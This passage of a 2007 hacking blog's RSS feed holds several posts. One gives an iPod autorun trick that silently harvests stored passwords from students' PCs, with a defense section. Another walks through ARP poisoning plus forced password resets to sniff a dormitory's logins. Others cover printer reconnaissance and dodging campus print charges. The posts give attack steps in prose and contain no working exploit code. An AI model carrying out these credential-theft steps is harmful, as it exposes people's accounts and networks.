Now that we have a working autorun.inf and ipod.exe, it's as simple as unplugging your media device, then plugging it back in. Thankfully, on Windows XP only CDs are allowed to run autorun with no user intervention, so we need to click on the media device; on older versions, however, this stick will run itself. This is where offers of music work wonders. If a business executive will give out a <a href="http://news.bbc.co.uk/1/hi/technology/3639679.stm">password for a chocolate bar</a>, how many college students will let you open your iPod to give them free music? The first time you double-click on the media device it'll run ipod.exe, which happens to run silently. This also pulls up the custom icon, so you can mutter something, then right-click->explore the drive to grab the file you promised them. It appears entirely as if the media device was just loading, and wonder of wonders, you recover any passwords stored in plain text. After you walk away, boot the media device into Rockbox, and browse through to see what you got. Evil, huh?</p>
<p><strong>Expanding the Hack</strong><br />
Clearly you can see from this example that anything could be run, it need not be these specific programs, or anything malicious at all. One could pop up any website they wanted, which could be a great Valentine's day gift. Not only do you give a kick butt new media player, but you've personalized it to pop up a website that expresses your love automatically. I guarantee a hug at least, or your money back. I've changed my autorun.inf to be the following:</p>
<blockquote><p>
[autorun]<br />
shellexecute=http://www.stop-phishing.com<br />
icon=ipod.ico
</p></blockquote>
<p>I don't want to be scanning my own system whenever I put new music on, and I really don't want to accidentally attack friends (Shelb, I am so sorry!). Plus the IU informatics department is a great group to give free publicity to. </p>
<p>On the other hand, one could get more evil and toss a rootkit on the device; we all know that's no worse than simply buying a CD. Or perhaps a host of viruses; anything that can be done by a Windows executable and 60GB of space is possible here.</p>
<p><strong>Defense</strong><br />
I was remiss last night in posting this without a defense section. The easiest way to prevent it from autoplaying is to hold Shift while inserting any media. This goes for CDs or USB sticks (again, on XP you only have to worry about CDs or U3 Cruzers). If that fails, a handy trick can be found <a href="http://blogs.developerfusion.com/blogs/thushan/archive/2007/05/06/3066.aspx">here</a> to disable autorun in Windows. To quote Thushan Fernando:</p>
<ol>
<li>Start > Run, type in 'gpedit.msc' without the quotes, this will show you the Group Policy Editor.</li>
<li>Go to 'Computer Configuration' > 'Administrative Templates' > 'System' and select 'Turn Off Autoplay'</li>
<li>When the properties for the policy pops up, check 'Enable' and select 'All Drives' and hit OK.</li>
</ol>
<p>This option stops autorun.inf from ever running, and I highly recommend it.</p>
<p><strong>Research</strong><br />
This would be a great study to see how many people let you plug in, by incrementing the variable in some text file every time ipod.exe is run. (Note the previous was a benign idea, the following are not likely to be approved research). Other ideas might be to infect it with a virus that listens for an iPod to be plugged in, then records the meta data off the iPod. This then could be tossed into something like the Music Genome Project to identify bands the user might enjoy. Then you either trigger a pop up that targets that band, or wait to catch an email address and send them some personal reminders about new CDs coming out. And of course this could be like any boot sector virus and pass itself along to any iPods that are plugged in at a later point in time.</p>
<p>I hope to keep playing around with the iPod as a platform for hacking, as it is so commonplace on a college campus. My ultimate goal is probably getting a sniffer running nicely and saving the pcap file for later dissection. Of course, I'd really like to get the iPod directly on the 'Net without using iPod Linux (since Rockbox is also Free Open Source, but supports many platforms) so that I could plug it into random routers that lie about.</p>
<p>And the best part of all this? You can perform the attack while listening to your favorite tunes!</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/11/06/ihack-the-beginning/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mastercard Promotes Credit Theft</title>
		<link>http://thesnarky.com/2007/07/08/mastercard-promotes-credit-theft/</link>
		<comments>http://thesnarky.com/2007/07/08/mastercard-promotes-credit-theft/#comments</comments>
		<pubDate>Mon, 09 Jul 2007 00:57:02 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Annoyances]]></category>
		<category><![CDATA[Real Life Rights]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://thesnarky.com/2007/07/08/mastercard-promotes-credit-theft/</guid>
		<description><![CDATA[I saw a commercial on TV the other day that made me laugh. I'm sure normal people see this commercial as a sign of how advanced our technology is, and how convenient modern life is, but all I see is theft.]]></description>
			<content:encoded><![CDATA[<p>I saw a commercial on TV the other day that made me laugh. I'm sure normal people see this commercial as a sign of how advanced our technology is, and how convenient modern life is, but all I see is theft.</p>
<p><a href="http://www.youtube.com/watch?v=_V6X0bCvCPE">Here's the video</a></p>
<p>Watch that through, then think about this. Elephants can't obtain credit cards, so that must have been the trainer's card. Not one clerk ever thought to get a signature for their sales. The elephant spent $40 without ever having an ID checked or even needing to know a PIN. </p>
<p>To quote Mastercard's offer: "Signature is not required for purchases under $25 at participating locations. PIN may be required for debit transactions," so this would be fairly limited in the US, aside from doing a bunch of small purchases stealing groceries or small items.</p>
<p>But this card is valid in the United States, Canada, the United Kingdom, Japan, Korea, Thailand, Turkey, Lebanon, Malaysia, Australia, Taiwan, the Philippines, and South Africa. Some of those places are hardly known for keeping your credit cards safe from theft, and I'm sure shopkeepers would be fairly lax regarding getting signatures for large purchases.</p>
<p>Anyways, I just found it really funny that Mastercard touts this great new service, when in reality it's showing how easy it is to use their service to steal!</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/07/08/mastercard-promotes-credit-theft/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Plaintext Passwords&#8230; Again!</title>
		<link>http://thesnarky.com/2007/05/25/plaintext-passwords-again/</link>
		<comments>http://thesnarky.com/2007/05/25/plaintext-passwords-again/#comments</comments>
		<pubDate>Fri, 25 May 2007 20:47:43 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Perl]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://thesnarky.com/2007/05/25/plaintext-passwords-again/</guid>
		<description><![CDATA[If you follow my blog, and sadly most of my readers have stopped checking, you'll remember the security hole I found on a major website around Valentine's Day. You should also remember I had a very good experience with the developers there, in terms of their competence and politeness. Well, I just tried to log [...]]]></description>
			<content:encoded><![CDATA[<p>If you follow my blog, and sadly most of my readers have stopped checking, you'll remember the <a href="http://thesnarky.com/2007/02/13/plain-text-passwords/">security hole</a> I found on a major website around Valentine's Day. You should also remember I had a very <a href="http://thesnarky.com/2007/02/21/plain-text-passwords-followup/">good experience</a> with the developers there, in terms of their competence and politeness. </p>
<p>Well, I just tried to log in to that site on an account I haven't used in... well.. a long time, let's leave it at that. Sadly, I'd forgotten my password, and they do a very smart thing in limiting how many failed logins one can have before resetting the password, forcing me to reset my password. Up to this point, everything is working as it should, removing the possibility of brute force attacks with only limited user annoyance every few months.</p>
<p>Then I noticed that... uh-oh... the reset page wasn't SSL. I thought "Oh, don't worry, I'll bet it's posted to an SSL domain," but grepping the source proved otherwise. Bugged, I decided to sniff my traffic and see what was happening, and sure enough, my password flew by in plaintext. This time it wasn't anything as stupid as a "Mother's Maiden Name" type question that also requires a little social engineering, this is MY PASSWORD, and MY USERNAME flying by. </p>
<p>Here's a look at a sanitized version of the information in the packet that gives it all away.</p>
<blockquote><p>
Content-Type:application/x-www-form-urlencoded<br />
Content-Length:102<br />
submitok=1<br />
cc=ff6cda68ba7b4c<br />
tt=1180114618<br />
email=****@****.***<br />
newpass1=PLAINTEXT<br />
newpass2=PLAINTEXT
</p></blockquote>
<p><strong>The Impact:</strong><br />
If I have to be sniffing the traffic in order to catch the password, this isn't as effective as, say, just phishing for the credentials, but this attack doesn't require any human stupidity. </p>
<p>However, this again is a very effective attack for large networks. <a href="http://en.wikipedia.org/wiki/ARP_poisoning">ARP Poisoning</a> is fairly trivial in this day and age, so even on a switched network one can grab these credentials. On a large network such as a dormitory, or campus this attack will work on as many people as are connected to the router you have access to. Worse, combine this with a botnet or other malware on a victim's machine, and it'll work on everyone who logs on to the site on an infected computer. </p>
<p>Another fun trick, as identified by the <a href="http://www.indiana.edu/~phishing/">researchers at Indiana University</a>, is subverting routers. If one subverts a router to modify the firmware, such an attack could easily be set up to happen on all traffic passing through the router, eliminating the need for ARP Poisoning. However, this requires an insecure router to start with, and the target would be a much smaller number.</p>
<p><strong>The Attack:</strong><br />
I'll talk through an attack from a dormitory, as that's the first I thought of. Once you're set up with your ARP Poisoning, it's time to get users to reset their password. Get a large list of email addresses from your school (this is very, very easy to script, you should be able to get tons of addresses). Now, you can either exploit the password reset security feature, or simply hit the reset.php page with each email address. Once you've reset the password, sit and sniff the network for any packets going to the page that actually does the resetting. Save all those packets, and you have all the information you need to compromise the accounts of everyone in your dorm!</p>
<p>I happen to know (whipped up a script to prove it) that this can quite easily be done in Perl where you never have to do anything, just sit and watch the logins go by.</p>
<p><strong>The Payoff:</strong><br />
Once you have all the logins, you can either be very malicious and overt, or very subtle and clever. One might immediately hit the account page to change the password to something to lock out the legitimate user, or maybe even delete the account. Or, to be clever, throw all the logins into a database for later exploitation. It'd be smarter to do the second, because then the attack will go unnoticed for a while.</p>
<p><strong>My Actions:</strong><br />
As usual, I'm accompanying this post with an email to the development squad of that website. I'm not releasing the name of the site, will delete any comments that say what site it is, and won't make my exploit code available anywhere. I will speak for the quality of the site's developers, from my last dealings with them, and know this will be fixed before any real attacks can be launched.</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/05/25/plaintext-passwords-again/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fun had with Printers &#8211; In Depth</title>
		<link>http://thesnarky.com/2007/03/10/fun-had-with-printers-in-depth/</link>
		<comments>http://thesnarky.com/2007/03/10/fun-had-with-printers-in-depth/#comments</comments>
		<pubDate>Sat, 10 Mar 2007 05:12:54 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Interests]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://thesnarky.com/archives/147</guid>
		<description><![CDATA[I'm in a bad way right now. Personal issues just about every week have made this semester the semester from Hell. Well, today was the worst, I've almost snapped from stress, depression, lots of stuff. Not meaning for this to be emo, just want to set up what goes into these posts more. Anyways I went running tonight. Car's messed up, needed to get out so I just lit out runnin. Ended up (so far, nowhere near done) at the school library, wanting to do some hacking. A lot of my hacking is done when I'm trying to clear my mind of larger issues, which is how I get issues so bottled up inside that I can snap. This is a problem, but tonight, I just need an escape. So I *just* hit publish on a semi-decent write up of fun I've had with printers, and I want to show you some more in depth.

I'd like to start with saying I'm not doing this to be malicious... I'm just curious about these printers. Nothing I do will be aimed at hurting the printer in any way, nor the school network. I'm not doing anything here because I'm bitter or have pent up stress, I need an escape, and here's a great way to spend 30 minutes off in a wonderful world of binary choices where everything works out right. Without further ado: a look at my school's printers.]]></description>
			<content:encoded><![CDATA[<p>I'm in a bad way right now. Personal issues just about every week have made this semester the semester from Hell. Well, today was the worst, I've almost snapped from stress, depression, lots of stuff. Not meaning for this to be emo, just want to set up what goes into these posts more. Anyways I went running tonight. Car's messed up, needed to get out so I just lit out runnin. Ended up (so far, nowhere near done) at the school library, wanting to do some hacking. A lot of my hacking is done when I'm trying to clear my mind of larger issues, which is how I get issues so bottled up inside that I can snap. This is a problem, but tonight, I just need an escape. So I *just* hit publish on a semi-decent write up of fun I've had with printers, and I want to show you some more in depth.</p>
<p>I'd like to start with saying I'm not doing this to be malicious... I'm just curious about these printers. Nothing I do will be aimed at hurting the printer in any way, nor the school network. I'm not doing anything here because I'm bitter or have pent up stress, I need an escape, and here's a great way to spend 30 minutes off in a wonderful world of binary choices where everything works out right. Without further ado: a look at my school's printers.<br />
<span id="more-147"></span><br />
Tech specs: My school primarily uses <a href="http://www.hp.com">HP</a> printers, and specifically we have a LOT of <a href="http://h10010.www1.hp.com/wwpc/uk/en/sm/WF06a/5043-5343-5347-5347-5439-8263403.html">4350</a>s. I really like these printers, not sure why because I don't know many printers by model number, but they're very user (read: hacker) friendly. Walked right up to one, figured out how to make it spill its guts half a minute later. They print rather fast (52 pages per minute, though PDFs take forever to spool up), and the quality's nice (1200x1200 dpi).</p>
<p>So what does this take? If you walk up to one of these (you can adapt this technique to most modern printers quite easily) and push the big green check mark button, this brings up the menu. Scroll down one, push the green button again, and you'll get "Information". The first item (if you've got my model) is "Print Menu map"; go ahead and do this. In a few seconds, the printer will spit out a nice, two-sided menu map. Take this to your seat and pretend to proofread it.<br />
<a href="http://thesnarky.com/html/pictures/printers/menumap.jpg"><img src="http://thesnarky.com/html/pictures/printers/menumap.jpg" alt="menumap of HP 4350 printer" /></a></p>
<p>Above you see the administrative section of the printer. Here's some fun stuff including its IP, and a wealth of other information. Note: Secure Web - Optional... bingo. The <a href="http://thesnarky.com/html/pictures/printers/config.jpg">other pages</a> have <a href="http://thesnarky.com/html/pictures/printers/config2.jpg">good information</a> as well, well worth poking around.</p>
<p>Let's type that IP we found into our browser, and note that it looks a lot like our printouts, just a prettier display. There doesn't appear, at first glance, to be any special admin control from here (other than being able to pause/resume print jobs), but still kind of cool (check out the "Control Panel" tab... you can read what's on the LCD!).</p>
<p><a href="http://thesnarky.com/html/pictures/printers/website.jpg"><img src="http://thesnarky.com/html/pictures/printers/website.jpg" alt="Website for HP 4350" /></a></p>
<p>Ok, that's just kinda cute recon, let's do some real hacking. The picture below is a handy little file tree that the printer will spit out for you. Please note, for those of you who don't know permissions, that there are nine letters: r (read), w (write), and x (execute), repeated three times. They specify the permissions for owner, group, and other.<br />
<img src="http://thesnarky.com/html/pictures/printers/files.jpg" alt="HP 4350 file structure" /></p>
<p>Now, our goal is to gain access to this file system, and if we can get FTP, or TELNET up and running, we can look at these lovely files. I'm going to leave that for another day, as I'm getting weird looks from the center desk staff of the library, and I've been here for a bit too long. Back to my run, I hope this was informative!</p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/03/10/fun-had-with-printers-in-depth/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fun Had With Networks &#8211; Shared Printers</title>
		<link>http://thesnarky.com/2007/03/09/fun-had-with-networks-shared-printers/</link>
		<comments>http://thesnarky.com/2007/03/09/fun-had-with-networks-shared-printers/#comments</comments>
		<pubDate>Sat, 10 Mar 2007 03:53:12 +0000</pubDate>
		<dc:creator>Snarky</dc:creator>
				<category><![CDATA[Interests]]></category>
		<category><![CDATA[Productivity]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://thesnarky.com/archives/146</guid>
		<description><![CDATA[So, if you've never read this blog before, quick fact: I have issues with my school's networks. I've been kicked off them before for "SSH brute forcing" a server set up to BE brute forced. I've been denied various requests for accounts being transferred to me due to being a student and the administration not thinking I need said account. I've had money paid to other people with almost my same name because the administration was too lazy to use my email address.... or something, still not sure how that happened. Moral of the story, there's a lot of annoyances I deal with regarding this network, though it's probably mainly my fault for being the way I am. 

Now, for the lighter side of things, fun times that can be had with large networks of computers.]]></description>
			<content:encoded><![CDATA[<p>So, if you've never read this blog before, quick fact: I have issues with my school's networks. I've been kicked off them before for "SSH brute forcing" a server set up to BE brute forced. I've been denied various requests for accounts being transferred to me due to being a student and the administration not thinking I need said account. I've had money paid to other people with almost my same name because the administration was too lazy to use my email address.... or something, still not sure how that happened. Moral of the story, there's a lot of annoyances I deal with regarding this network, though it's probably mainly my fault for being the way I am. </p>
<p>Now, for the lighter side of things, fun times that can be had with large networks of computers.<br />
<span id="more-146"></span></p>
<p>At my school you "need" a CD to get on the school network. Meaning, you have to run their CD, and install all its crap to get on. Really, all that it takes is just to register your MAC address, and actually just faking one works as well. But I digress. On this CD is a BUNCH of useless, slow, and annoying software. There's also one feature I like... a printer select utility. This really is nothing, just an easy way to add printers to a computer on the campus network. Typically, the idea is for laptops to find the closest printer... Hackers don't like to use software as intended however, and this is no different. </p>
<p>We've got some really nice printers here, new HPs among others, that are just GORGEOUS print quality. For some odd reason they suck at printing PDFs. It'll take about 10-15s per page to spool up, as opposed to a good page a second on regular text files. So if you do this from a lab and stand in front of the printer, EVERYONE hates you. I've seen 10 page PDFs take up to 5 minutes to print, and there's no smart queueing whereby regular documents could get pumped to a higher priority. Moral of the story, you can't print PDFs except at night, and if you want to get yelled at. That is, if you're in the lab. I'll add a printer from a big building near the center of campus from my office last year (a good 15 minute walk), print my PDF, and walk over. By the time I get there I just walk in, pretend to be a computer aide, "check" the printer, take my PDF and walk out. I've wasted none of my time, as I had to walk across campus anyways, and no one knows it was me tying up the printer. </p>
<p>Same works if someone prints a PDF ahead of you. I had to print an important paper in about 5 minutes, and the girl next to me printed a 20 page PDF. I was quite irked, but just printed a copy to the printer next door, and walked over there to fetch it. Again, my time isn't wasted and no one's the wiser. </p>
<p>Now, that's just basic stuff, let's have some FUN. All new printers are actually computers, at least the high end ones. They've got JVMs (Java virtual machines), RAM, and typically a web server. Also, an easy to get at diagnostics printout from the printer itself, though this can be password protected. Luckily at my school they never protect it, because what does a menu listing show anyways?! Well, for starters it's the recon I use to find the goodies. Typically I'll print one of these out to find the quickest route to a configuration printout, which is the next thing I print. Once I have that, I've got a wealth of information, including (my favorite) the IP and if it's got a web server running. If it does, one can log right into that and get much more information. Most times there's no password set, and there's a direct print option from this pane. Why do I care about that? Because if I go over my print allotment (printing any other way deducts from my print allotment) I have to pay $.10 per page. Here's a way I can print directly to any printer on campus without paying a thing... *shh* don't tell anyone.</p>
<p>Now, lessons to be learned from this? For network users it would be that the admins might give you more power than they think. Do not abuse this power (i.e. printing a bunch of blank pages, or a PDF of all black pages to be an annoyance to the campus) because that's just immature. But do a little exploration and find out what's available to you if you just *have* to get a certain paper in and something goes horribly wrong. </p>
<p>For network admins it would be that you need to make sure you know what you're giving your users access to. Yeah, your new printer is cool, and it has no password because you either want access to that without memorizing a certain password, or just didn't know it was available, but now you have a huge hole in your network. If it's got a processor, it can spread a virus, and these things even have a JVM, which can be oh so fun. </p>
]]></content:encoded>
			<wfw:commentRss>http://thesnarky.com/2007/03/09/fun-had-with-networks-shared-printers/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

